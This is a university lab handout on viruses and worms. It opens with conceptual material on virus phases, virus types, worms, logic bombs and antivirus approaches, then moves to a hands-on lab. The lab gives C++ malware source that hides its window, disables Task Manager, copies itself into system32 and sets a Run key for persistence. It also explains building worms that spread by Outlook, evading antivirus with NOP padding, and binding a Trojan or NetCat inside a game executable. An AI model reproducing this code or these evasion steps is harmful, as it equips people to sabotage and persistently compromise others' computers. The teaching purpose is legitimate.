Internet Security ECOM 5347 Lab 14 Viruses & Worms

Virus and Worms

Objectives
To know more about computer malicious code and how does it
works.

Computer Virus:

Briefly we can defined computer virus as a program that inserts

itself into one or more files and then performs some (possibly null)
action.

The first phase, in which the virus inserts itself into a file, is called the
insertion phase. The second phase, in which it performs some action, is
called the execution phase. The following pseudocode fragment shows
how a simple computer virus works.
Beginvirus:
if spread-condition then begin
for some set of target files do begin
if target is not infected then begin
determine where to place virus instructions
copy instructions from beginvirus to endvirus
into target
alter target to execute added instructions
end;
end;
end;
perform some action(s)
goto beginning of infected program
endvirus:

As this code indicates, the insertion phase must be present but need not
always be executed. For example, a virus that infect boot file would
check for an uninfected boot file (the spread-condition mentioned in the
pseudocode) and, if one was found, would infect that file (the set of
target files).

Another description for virus lifetime divides it to four phases:

1. Dormant phase: The virus is idle. The virus will eventually be

activated by some event, such as a date, the presence of another

136
Internet Security ECOM 5347 Lab 14 Viruses & Worms

program or file, or the capacity of the disk exceeding some limit.

Not all viruses have this stage.
2. Propagation phase: The virus places an identical copy of itself into
other programs or into certain system areas on the disk. Each
infected program will now contain a clone of the virus, which will
itself enter a propagation phase. Virus propagation requires
human activity such as booting a computer, executing an AutoRun
on a CD, or opening an email attachment.
3. Triggering phase: The virus is activated to perform the function for
which it was intended. As with the dormant phase, the triggering
phase can be caused by a variety of system events, including a
count of the number of times that this copy of the virus has made
copies of itself.
4. Execution phase: The function is performed. The function may be
harmless, such as a message on the screen, or damaging, such as
the destruction of programs and data files.

Types of Viruses

Viruses take many different forms. The following lines introduce

common types and explain how they work. These are the most, but this
isn’t a comprehensive list.

Parasitic virus: The traditional and still most common form of virus. A
parasitic virus attaches itself to executable files and replicates, when the
infected program is executed, by finding other executable files to infect.

Polymorphic virus: A virus that mutates with every infection, making

detection by the "signature" of the virus impossible. This type of viruses
encrypt parts of itself to avoid detection. When the virus does this, it’s
referred to as mutation

Metamorphic virus: As with a polymorphic virus, a metamorphic virus

mutates with every infection. The difference is that a metamorphic virus
rewrites itself completely at each iteration, increasing the difficulty of

137
Internet Security ECOM 5347 Lab 14 Viruses & Worms

detection. Metamorphic viruses my change their behavior as well as

their appearance.

Armored virus: an armored virus is designed to make itself difficult to

detect or analyze. Armored viruses cover themselves with protective
code that stops debuggers or disassemblers from examining critical
elements of the virus. The virus may be written in such a way that some
aspects of the programming act as a decoy to distract analysis while the
actual code hides in other areas in the program.

Companion virus: A companion virus attaches itself to legitimate

programs and then creates a program with a different filename
extension. This file may reside in your system’s temporary directory.
When a user types the name of the legitimate program, the companion
virus executes instead of the real program. This effectively hides the
virus from the user. Many of the viruses that are used to attack
Windows systems make changes to program pointers in the Registry so
that they point to the infected program. The infected program may
perform its dirty deed and then start the real program.

Multipartite virus: A multipartite virus attacks your system in multiple

ways. It may attempt to infect your boot sector, infect all of your
executable files, and destroy your application files. The hope here is that
you won’t be able to correct all the problems and will allow the
infestation to continue. The multipartite virus in Figure 2.17 attacks your
boot sector, infects application files, and attacks your Microsoft Word
documents.

Figure 1 Multipartite Virus

138
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Retrovirus: A retrovirus attacks or bypasses the antivirus software

installed on a computer. You can consider a retrovirus to be an anti-
antivirus. Retroviruses can directly attack your antivirus software and
potentially destroy the virus definition database file. Destroying this
information without your knowledge would leave you with a false sense
of security. The virus may also directly attack an antivirus program to
create bypasses for itself.

Stealth virus: A stealth virus attempts to avoid detection by masking

itself from applications. It may attach itself to the boot sector of the
hard drive. When a system utility or program runs, the stealth virus
redirects commands around itself in order to avoid detection. An
infected file may report a file size different from what is actually present
in order to avoid detection. Figure 2.19 shows a stealth virus attaching
itself to the boot sector to avoid detection. Stealth viruses may also
move themselves from fileA to fileB during a virus scan for the same
reason.

Figure 2 Stealth Virus

Phage virus: a phage virus modifies and alters other programs and
databases. The virus infects all of these files. The only way to remove
this virus is to reinstall the programs that are infected. If you miss even a
single incident of this virus on the victim system, the process will start
again and infect the system once more.

Worms

A worm is a program that can replicate itself and send copies from
computer to computer across network connections. Upon arrival, the
worm may be activated to replicate and propagate again. In addition to
propagation, the worm usually performs some unwanted function. Early
worms filled up memory and bred inside the RAM of the target

139
Internet Security ECOM 5347 Lab 14 Viruses & Worms

computer. Worms can use TCP/IP, e-mail, Internet services, sharing

folders or any number of means to each of their target

A worm is different from a virus in that it can reproduce itself, it’s self-
contained , and it doesn’t need a host application to be transported.
Many of the so-called viruses that have made the papers and media
were, in actuality, worms and not viruses. However, it’s possible for a
worm to contain or deliver a virus to a target system.

Logic Bomb

The logic bomb is code embedded in some legitimate program that is set
to "explode" when certain conditions are met and performs an action
that violates the security policy. Examples of conditions that can be used
as triggers for a logic bomb are the presence or absence of certain files,
a particular day of the week or date, or a particular user running the
application. Once triggered, a bomb may alter or delete data or entire
files, cause a machine halt, or do some other damage.
Example:

In the attack depicted in Figure 2.20, the logic bomb sends a message
back to the attacking system that it has loaded successfully. The victim
system can then be used to initiate an attack such as a DDoS attack, or it
can grant access at the time of the attacker’s choosing.

Figure 3

140
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Bacteria, or rabbit programs, make copies of themselves to

overwhelm a computer system's resources. Bacteria do not explicitly
damage any files. Their sole purpose is to replicate themselves. A typical
bacteria program may do nothing more than execute two copies of itself
simultaneously on multiprogramming systems, or perhaps create two
new files, each of which is a copy of the original source file of the
bacteria program. Both of those programs then may copy themselves
twice, and so on. Bacteria reproduce exponentially, eventually taking up
all the processor capacity, memory, or disk space, denying the user
access to those resources.

Antivirus Approaches

The ideal solution to the threat of viruses is prevention: Do not allow a

virus to get into the system in the first place. This goal is, in general,
impossible to achieve, although prevention can reduce the number of
successful viral attacks. The next best approach is to be able to do the
following:

 Detection: Once the infection has occurred, determine that it has

occurred and locate the virus.
 Identification: Once detection has been achieved, identify the
specific virus that has infected a program.
 Removal: Once the specific virus has been identified, remove all
traces of the virus from the infected program and restore it to its
original state. Remove the virus from all infected systems so that
the disease cannot spread further.

141
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Lab Experiment
Requirements:
We need only one machine in this experiment to built our malicious code and
run it.

Procedures :
Part 1 : Writing your virus (Using C++):

Code
#include <windows.h>
#include <iostream>
using namespace std;
int main ( )
{
//----------------1--------------------
AllocConsole();
ShowWindow (FindWindowA("ConsoleWindowClass",NULL),0);
//----------------2--------------------
HKEY hKey;
unsigned char reg[2] = "1";

RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\
CurrentVersion\\Policies\\system",&hKey);

RegSetValueEx(hKey,"disabletaskmgr",0,REG_DWORD,reg,sizeof(reg
));
RegCloseKey(hKey);

//------------------3------------------
char windir[MAX_PATH];
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\code.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] = windir+"";
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersi
on\\Run",0,KEY_SET_VALUE,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersio
n\\Run",0,KEY_SET_VALUE,&hKey2 );

142
Internet Security ECOM 5347 Lab 14 Viruses & Worms

RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
//------------------4------------------
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH, path, 255);
CopyFile(path,"C:\\code.exe",FALSE);

system("pause");
return 0;

For the above code : (each number below is corresponding to number in comment in
code):

1- This code hide the resultant virus window that must be displayed when you
run any application normally.
2- This part of code create a new registry key named disabletaskmgr in the path
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system in
HKEY_CURRENT_USER to disable task manager (ctrl+alt+delete) , we assign
value 1 to new registry key.
Method RegCreateKey create new key and RegSetValueEx set the value for
the specified key.
3- In this part we copy our malicious code to a path so that it can be run at
startup; For the code below we get path of windows folder using
GetWindowsDirectory method , we obtain module handle name by
GetModuleFileName and copy it to system32 folder in windows directory by
CopyFile method ; then we create a registry key in
Software\\Microsoft\\Windows\\CurrentVersion\\Run to run this
code when the computer starts or logon.
4- Last part of code , we use to copy our code in different paths so that it is
difficult to erase ,this part to spread your virus code you can add more
CopyFile statement.

Part 2: Hiding Viruses

143
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Virus construction Kit :

- After running the construction kit, specify the name of your worm before you
shift to other options .The main interface of this kit is shown in figure 4,
figure 5 also display backup options where path and registry key will this
worm reside.

Figure 4

Figure 5

- If you want to spread your worm via outlook (if your victim use outlook) ; you
can determine a message title and body; you can configure from Outlook
Options the same thing you can configure other spreading options such P2P.

144
Internet Security ECOM 5347 Lab 14 Viruses & Worms

- Now choose the action you want to perform from the list that included in
Payload Options; let us choose Run File/Link and type www.iugaza.edu.ps,
payload options available by this tool is listed in figure 6.

Figure 6

- The last thing is determine when your action will tack place form Payload
Trigger Options figure 7; you can choose on execution as an example; then
click construct worm.

Figure 7

- When you run the resultant worm the result as the figure 8.

145
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Figure 8

Stealth Tools :
We can use this tool to hide viruses and malwares also Trojans from antivirus
software.
- First of all determine the file you want to use as virus .
- Add Bytes : it is add white bytes = NOP instruction ; it is useful to throwing
off antivirus software ; figure 9 shows the interface of this tool and simple
configuration of add bytes option.
Test the file size before and after adding NOP operation?
Open the produced file using any text editor and see NOP operation.

146
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Figure 9

- Another method to hide your malicious code is binding file with another
executable file to create single executable file as shown in figure 10.

Figure 10

147
Internet Security ECOM 5347 Lab 14 Viruses & Worms

Eliterwrap Tool:
Another tool we can use to hide executable files is eliterwrap ; this tool allow
you to hide executable file (malicious code : Trojan or virus) in legal one as solitaire
game as example.

By this tool we can embed tool such NetCat (refer to NetCat lab) and we specify the
command to execute when running the file in Enter command line step, with
another executable file.

Figure 11 shows hiding Trojan named patch with solitaire spider to produce
executable file named play.exe.

Figure 11

Exercise:
Write a virus code in c++ to disable regedit and run on startup ; hide your
code in any method . In your opinion what is the effective way to hide the
code to be away of antivirus discovery.

148